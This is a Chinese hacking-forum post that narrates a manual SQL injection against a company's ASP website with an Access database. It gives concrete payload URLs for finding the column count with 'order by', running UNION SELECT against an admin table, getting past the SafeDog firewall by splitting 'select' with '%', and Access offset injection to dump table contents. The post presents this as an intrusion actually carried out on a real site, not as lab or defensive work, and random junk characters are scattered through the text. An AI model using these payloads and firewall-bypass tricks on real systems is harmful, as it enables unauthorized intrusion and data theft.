找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2048|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。2 _& U# Z" C: k* h. [# H: T

0 c3 x* k+ f* n
$ ^* ]4 t5 h  f. n; C顺手加个admin0 d5 o" y, S# [/ F1 I% i

$ V8 x* g' _; }6 u3 p5 e5 R& `$ J4 K. L* v1 n# D- l; |& G
默认后台。2 k  @4 \2 b# n  p" j/ k
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​% h9 w9 N* M  F- q4 ~9 O- q$ a  o% f
$ g+ D# H& |$ i7 K
3 c: ], o3 y/ F. {6 y4 Z
3 q3 q, w! y: Q& g( d# P0 r
所以就不用御剑扫了,待会直接封IP。$ r3 F0 _3 v/ k

- @* ]9 h0 z! ^* B用order by语句判断是否存在注入。
& [( S! Q4 q1 Z) x" N5 r& I# ihttp://www.xxx.com /product_show.asp?id=997 order by 1- y2 e0 ]( G; j" Z. E& D2 O; @1 E
http://www.xxx.com /product_show.asp?id=997 order by 100
+ b4 E* F( F5 i6 Z$ p现在存在注入,经测试后发现是9个字段。$ j$ h- r: Z1 A, v3 {: N% l+ X
/ j& s. s( G# P% J$ Q
接下来进行联合查询,猜是否存在admin表。6 h6 K2 V( C0 W; j
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​" o5 u# w! x1 ?8 v
( H3 @" m  v& `  k1 c

) u- x' s, z' y2 K- ?% h( v# Y7 o# z8 q/ K
在select中间加个%,se%lect绕过安全狗。
9 P' i- c0 u. G* h4 A+ q% H
. I7 ~  V$ ^0 i8 P& R- u6 L3 ~5 B, }4 x7 w3 r3 @
发现存在admin表,然后开始手工猜常用的字段。
& w- j& g0 J2 p4 g纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
- c% s% X  n" F 7 m! p3 S' G1 D. l1 A
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。7 o4 \8 L* G9 W* k  V3 L7 @  J
% y! H0 _7 F/ z) [; a7 k4 r
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
" v; e, K6 P' s7 W3 h9 Khttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin3 q$ v, t) V  }: |: U) A+ I
好了,敏感内容出显了。​" c  N( c: V, _: ], e% o( i

- R! G/ h/ o" k5 H0 }* Z, d' p6 `- H* ]

/ f6 ^! q$ k+ a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表